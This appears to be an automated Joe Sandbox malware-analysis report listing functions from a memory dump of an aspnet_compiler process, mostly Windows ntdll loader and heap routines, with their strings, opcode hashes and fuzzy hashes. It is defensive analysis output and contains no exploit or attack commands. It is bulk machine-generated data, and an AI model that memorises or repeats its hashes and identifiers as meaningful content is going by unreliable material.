                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 01AF2DF0: LdrInitializeThunk.NTDLL ref: 01AF2DFA
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AF0BA3
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AF0BB6
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AF0D60
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AF0D74
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                      • String ID:
                                                      • API String ID: 1404860816-0
                                                      • Opcode ID: 21f0f7c654efcbdd83d2b963af6fe0265c8b3d5436e4652647175de66d904df3
                                                      • Instruction ID: 028fa1b29acf9f133441dc162b84e955149a7c223fe182ca2ff29db4cba6d232
                                                      • Opcode Fuzzy Hash: 21f0f7c654efcbdd83d2b963af6fe0265c8b3d5436e4652647175de66d904df3
                                                      • Instruction Fuzzy Hash: 04423971900715DFDB25CF68C980BAAB7F5FF08314F1445AEEA899B242E770A985CF60
                                                      Function 01ABA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                      • API String ID: 0-379654539
                                                      • Opcode ID: e40820eb91d08580b5c4028c83dbaed22996ab218712af37174be5e521c7598e
                                                      • Instruction ID: 0ef1298a599107e25046501774e31ac52246586feabe5ecb92191fc0bc3c2c2c
                                                      • Opcode Fuzzy Hash: e40820eb91d08580b5c4028c83dbaed22996ab218712af37174be5e521c7598e
                                                      • Instruction Fuzzy Hash: 5BC18D74108386CFD715DF68C180BAAB7F8FF84704F0449AAF9958B252E738DA49CB56
                                                      Function 01AE8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01AE8421
                                                      • @, xrefs: 01AE8591
                                                      • LdrpInitializeProcess, xrefs: 01AE8422
                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01AE855E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1918872054
                                                      • Opcode ID: b62cea613e6cb236a2adca9645ecec36cc89b4359656b4d30595771084cb675b
                                                      • Instruction ID: 10be1afcfa676e30c08e1580992b49a19d70360198f4269157a1102ddd6b86b9
                                                      • Opcode Fuzzy Hash: b62cea613e6cb236a2adca9645ecec36cc89b4359656b4d30595771084cb675b
                                                      • Instruction Fuzzy Hash: CC918A71508345AFD721EF65CD85FABBAE8FF88744F40096EFA8892151E738D904CB62
                                                      Function 01AE273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01B221D9, 01B222B1
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01B222B6
                                                      • .Local, xrefs: 01AE28D8
                                                      • SXS: %s() passed the empty activation context, xrefs: 01B221DE
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                      • API String ID: 0-1239276146
                                                      • Opcode ID: a754534807a8f576ae5fa0843083c73598d2fa5deb663501d5377af6166da0ad
                                                      • Instruction ID: 41b9cd38bbb41c9327448ff85951b3e54173b00204a8117903076585f0c2e16c
                                                      • Opcode Fuzzy Hash: a754534807a8f576ae5fa0843083c73598d2fa5deb663501d5377af6166da0ad
                                                      • Instruction Fuzzy Hash: E2A19031900229DBDB25CF68CC88BA9B7F5BF59354F1541EAE908EB251D7309E84CF90
                                                      Function 01AE4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01B23456
                                                      • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01B23437
                                                      • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01B2342A
                                                      • RtlDeactivateActivationContext, xrefs: 01B23425, 01B23432, 01B23451
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                      • API String ID: 0-1245972979
                                                      • Opcode ID: e97de25fb9e1b08841c232e65ee793f09f7bb0657fa08d70d60461230fb7c9a3
                                                      • Instruction ID: 7f9e41056c95520034ac6a78322ff7cff7315979ce8684d9dcbc074bf7bfc9a2
                                                      • Opcode Fuzzy Hash: e97de25fb9e1b08841c232e65ee793f09f7bb0657fa08d70d60461230fb7c9a3
                                                      • Instruction Fuzzy Hash: A06135326007129BDB26CF1DC885B3AB7E9FF88B10F14859DE969DB250C738E845CB91
                                                      Function 01AB64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01B11028
                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01B1106B
                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01B110AE
                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01B10FE5
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                      • API String ID: 0-1468400865
                                                      • Opcode ID: 6374e7927dba5e26128d20dee72a0c4bb6c5ed861385557965edcfe57177f9d0
                                                      • Instruction ID: 3ce0c515ab8e9ca546556285542678ced423e0123467f3984cf8230ff6b18e71
                                                      • Opcode Fuzzy Hash: 6374e7927dba5e26128d20dee72a0c4bb6c5ed861385557965edcfe57177f9d0
                                                      • Instruction Fuzzy Hash: 6571CEB1904345AFCB21EF28C8C4B977FA8EF94764F440568F9498B18BD334D598CB92
                                                      Function 01AD245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • apphelp.dll, xrefs: 01AD2462
                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01B1A992
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01B1A9A2
                                                      • LdrpDynamicShimModule, xrefs: 01B1A998
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-176724104
                                                      • Opcode ID: abf471a03c572d09c22b27ecf8e54ec199fbfe5af1722df12469e15d68119d4b
                                                      • Instruction ID: 6c6f2e8e16a918f869c2d9f7cd69c2606f060f5154221c592dd193da3c6b6fa4
                                                      • Opcode Fuzzy Hash: abf471a03c572d09c22b27ecf8e54ec199fbfe5af1722df12469e15d68119d4b
                                                      • Instruction Fuzzy Hash: 3D3141B1600241ABDB359F6DD882FB9B7F5FB84710F9A405EF90167259C7706981CB40
                                                      Function 01AC29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01AC327D
                                                      • HEAP[%wZ]: , xrefs: 01AC3255
                                                      • HEAP: , xrefs: 01AC3264
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                      • API String ID: 0-617086771
                                                      • Opcode ID: 463e40be313ea153ba9de84b766dcc89f1dc1e4069fe845c6502ee8c82ba03b6
                                                      • Instruction ID: ec4ae44faba70059080ff17738bda45aea2804fd4cd581a0db54e2cc66c323e5
                                                      • Opcode Fuzzy Hash: 463e40be313ea153ba9de84b766dcc89f1dc1e4069fe845c6502ee8c82ba03b6
                                                      • Instruction Fuzzy Hash: 8B92AA71A042499FDF25CF68C4407AEBBF1BF48B10F1880AEE959AB352D735A945CF50
                                                      Function 01AC0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-4253913091
                                                      • Opcode ID: bcd6c068826e00a225233e49a908c2cc9ab7418189744cee145192a75ed894c2
                                                      • Instruction ID: 5777783f5f7543f0b918c74b946b6a8e9a2ab2d3ef3ae2e23773137608643e5f
                                                      • Opcode Fuzzy Hash: bcd6c068826e00a225233e49a908c2cc9ab7418189744cee145192a75ed894c2
                                                      • Instruction Fuzzy Hash: B8F1BE35A00606DFEB2ACF68C984BAAB7B5FF85700F1481ACE5169B355D734E981CB90
                                                      Function 01AD6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $@
                                                      • API String ID: 0-1077428164
                                                      • Opcode ID: de564b988bfa412e94048501793b17ec862cc9882c8e4a54167d0c8f36a3094d
                                                      • Instruction ID: b976c7c883098c682a084e60de5978d97745066155d6555b6480483c0bb3baea
                                                      • Opcode Fuzzy Hash: de564b988bfa412e94048501793b17ec862cc9882c8e4a54167d0c8f36a3094d
                                                      • Instruction Fuzzy Hash: 03C2A1716087419FDB29CF68C881BABBBE5BF88718F05896DF98AC7241D734D844CB52
                                                      Function 01AAA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                      • API String ID: 0-2779062949
                                                      • Opcode ID: 47003fc05d46fb4610a797e292b7623a1b88de91403788f984f75953530a92c2
                                                      • Instruction ID: a8651221d303d5a507afa2c1b61551b08fdda6f7135133402ceda4ba58795c85
                                                      • Opcode Fuzzy Hash: 47003fc05d46fb4610a797e292b7623a1b88de91403788f984f75953530a92c2
                                                      • Instruction Fuzzy Hash: A5A15E719116299BDF32DF64CD88BAABBB8FF44700F1141EAEA09A7250D7359E84CF50
                                                      Function 01AD0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Failed to allocated memory for shimmed module list, xrefs: 01B1A10F
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01B1A121
                                                      • LdrpCheckModule, xrefs: 01B1A117
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-161242083
                                                      • Opcode ID: 94821d92897cf9b4e8f0a6248a257e6e7d76794929f861d8c1ed1b8cadde2e81
                                                      • Instruction ID: 1e190f685f4efbdc24b38ce3cebdeb3f4cfee794fa8e13999357ce6bf76c2515
                                                      • Opcode Fuzzy Hash: 94821d92897cf9b4e8f0a6248a257e6e7d76794929f861d8c1ed1b8cadde2e81
                                                      • Instruction Fuzzy Hash: 6D71F1B0A00606DFDB29DF68CA85ABEB7F4FB48704F59406DE806E7255E734AD41CB40
                                                      Function 01AEC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01B282E8
                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 01B282DE
                                                      • Failed to reallocate the system dirs string !, xrefs: 01B282D7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1783798831
                                                      • Opcode ID: 1b6a48db48aab8b8e2624d8b0c3cdee1ff43c005b1f5bce98402371df8edd4a4
                                                      • Instruction ID: a33b867d0d027ae165365d7acebc91489b948e86febfadba0cb2c64a371fd8c8
                                                      • Opcode Fuzzy Hash: 1b6a48db48aab8b8e2624d8b0c3cdee1ff43c005b1f5bce98402371df8edd4a4
                                                      • Instruction Fuzzy Hash: 6241F3B1984311BBC720EB68DD45B9B7BE8FF54760F49492AF949D3254E770D800CB91
                                                      Function 01B6C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • @, xrefs: 01B6C1F1
                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01B6C1C5
                                                      • PreferredUILanguages, xrefs: 01B6C212
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                      • API String ID: 0-2968386058
                                                      • Opcode ID: 52695df924a7838dc2bff9203519b85092cacdd056a6be6cde2f59621f5153b9
                                                      • Instruction ID: 67df4ed1db98b4cfddfbe3505c782b7ead59e9f34df87647c0a3a765782cfce7
                                                      • Opcode Fuzzy Hash: 52695df924a7838dc2bff9203519b85092cacdd056a6be6cde2f59621f5153b9
                                                      • Instruction Fuzzy Hash: 75415271E0020AEBDF15DED8C951FEEBBBCEB24704F1441AAEA49B7250D7789A44CB50
                                                      Function 01B44144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                      • API String ID: 0-1373925480
                                                      • Opcode ID: 9f22f129c211fb31b4caaf4cd10303c562f8394fc29f300bf9d6b99db3f48023
                                                      • Instruction ID: 44e27734749fe6e7cfbac87a7a915515b53a6244fd90190f0a43c8759b9c6237
                                                      • Opcode Fuzzy Hash: 9f22f129c211fb31b4caaf4cd10303c562f8394fc29f300bf9d6b99db3f48023
                                                      • Instruction Fuzzy Hash: 71414371A106888BEB2ADFE9C940BADBBB8FF55740F14849AD901FB381DB349900CB10
                                                      Function 01B34755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrpCheckRedirection, xrefs: 01B3488F
                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01B34888
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01B34899
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 0-3154609507
                                                      • Opcode ID: b3575554843e572dd4922ca74fa334ba032654a01649ad71cdac046e6cec0c22
                                                      • Instruction ID: 1af5537f88b7af45a9fd95d13233037048e90c9377a357aedc1a46d748584418
                                                      • Opcode Fuzzy Hash: b3575554843e572dd4922ca74fa334ba032654a01649ad71cdac046e6cec0c22
                                                      • Instruction Fuzzy Hash: C541AF32A15651DFCB2ACE6DD840A26BBE4FFC9B50B0506E9ED5897351E730E820CB91
                                                      Function 01AC0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-2558761708
                                                      • Opcode ID: e6285182c403464b77eefeea2cd7bf183c5d7e1576d5a85f3616227ca7ddd7b9
                                                      • Instruction ID: 77dbeb7ace8c865e2f090ed483a845c6b1366af18daee18e662520415b3d71a4
                                                      • Opcode Fuzzy Hash: e6285182c403464b77eefeea2cd7bf183c5d7e1576d5a85f3616227ca7ddd7b9
                                                      • Instruction Fuzzy Hash: 2A11DC35394142DFDB2DDB28C551B6AB3A4EF82A16FA981ADF406CF259DB30E880C750
                                                      Function 01B320DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrpInitializationFailure, xrefs: 01B320FA
                                                      • Process initialization failed with status 0x%08lx, xrefs: 01B320F3
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01B32104
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2986994758
                                                      • Opcode ID: 90ad50d0c5b30be6b46d8ab6db99210b7bd73be6a5a0bb2058bb8203aa5af7fd
                                                      • Instruction ID: 85690d33586001df9651dcf7d51095d221f990d78205609d844d87a294657cda
                                                      • Opcode Fuzzy Hash: 90ad50d0c5b30be6b46d8ab6db99210b7bd73be6a5a0bb2058bb8203aa5af7fd
                                                      • Instruction Fuzzy Hash: BAF0FC35640308BBEB28E64DCD43F9A7BA8FB80B54F5400D9F7047B285D3B0A550C691
                                                      Function 01AC03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: #%u
                                                      • API String ID: 48624451-232158463
                                                      • Opcode ID: 60f3d2b382652e67c4582602607822ee9eeddab04fce53395264b22eb2cdb167
                                                      • Instruction ID: 6aee56ad6db044095abc5a92833da0f6f332cbc69b65c7417cef53b738e35f23
                                                      • Opcode Fuzzy Hash: 60f3d2b382652e67c4582602607822ee9eeddab04fce53395264b22eb2cdb167
                                                      • Instruction Fuzzy Hash: 02714771A0014A9FDF05DFA8CA90BAEBBF8FF18704F154069E905E7251EB34AD05CBA0
                                                      Function 01ABA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrResSearchResource Enter, xrefs: 01ABAA13
                                                      • LdrResSearchResource Exit, xrefs: 01ABAA25
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                      • API String ID: 0-4066393604
                                                      • Opcode ID: a2ab6282b4ee6890db503eb9da958e753d4d81d9e579203888e7135e98144e63
                                                      • Instruction ID: 1f034896effe8e5120cd10680803ca6408d6a87cf3c97c935035428e0dcfc68a
                                                      • Opcode Fuzzy Hash: a2ab6282b4ee6890db503eb9da958e753d4d81d9e579203888e7135e98144e63
                                                      • Instruction Fuzzy Hash: 79E19171E00249AFEF26DF99C980BEEBBB9FF08310F1545A9E911E7256E7349940CB50
                                                      Function 01B7A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `$`
                                                      • API String ID: 0-197956300
                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                      • Instruction ID: 6e97508afdc57923ed04c18b26f710728aeaa9e395e5eaa5a94c387096fa0614
                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                      • Instruction Fuzzy Hash: 52C1BD312043429BEB69CF28C845B6FBBE5EFC4718F084A6DF6A68B290D775D505CB81
                                                      Function 01B2E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      • Opcode ID: 3e155582bcc82b99fb391b728056ae5fd05f5660059737f860d8ccd03ada295f
                                                      • Instruction ID: 7663a6fa4c8756ff029f93d75ae1c8d2d8adb8833dcc32cdada91cf447697aa4
                                                      • Opcode Fuzzy Hash: 3e155582bcc82b99fb391b728056ae5fd05f5660059737f860d8ccd03ada295f
                                                      • Instruction Fuzzy Hash: E5617E71E003199FDB18DFAAC940BAEBBB5FB48700F1441ADE649EB291D771E944CB50
                                                      Function 01B543D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$MUI
                                                      • API String ID: 0-17815947
                                                      • Opcode ID: 5030f01582da94b561c7470759abda80f2ccf24b789a07810a3b60ec0acb1a8f
                                                      • Instruction ID: 056efa094ad1aaff0c5585a69b5f50a8e42ebe024357b501e6cb34c2043a0a7c
                                                      • Opcode Fuzzy Hash: 5030f01582da94b561c7470759abda80f2ccf24b789a07810a3b60ec0acb1a8f
                                                      • Instruction Fuzzy Hash: 43512771E0021DAEDF15DFE9DD84BEEBBB8EB44754F10056AEA11B7280E7309945CB60
                                                      Function 01AB04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01AB063D
                                                      • kLsE, xrefs: 01AB0540
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                      • API String ID: 0-2547482624
                                                      • Opcode ID: 81328cf1f0553a173f0e1250d57b4f2f1038dad0710185c67c7130aa610540d4
                                                      • Instruction ID: 4a71bdf217870fc0baf8fca9b66f44e8912117a29600ea5009009893c2fa7047
                                                      • Opcode Fuzzy Hash: 81328cf1f0553a173f0e1250d57b4f2f1038dad0710185c67c7130aa610540d4
                                                      • Instruction Fuzzy Hash: A0519D715047829BD724EF78C6806E7BBF8AF84304F14893EF69A87642E770E545CB91
                                                      Function 01ABA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 01ABA309
                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 01ABA2FB
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                      • API String ID: 0-2876891731
                                                      • Opcode ID: acc792594d0aa02195cc2ba32a06e77cda9c261de1f587ba0e7bee7e8834caa3
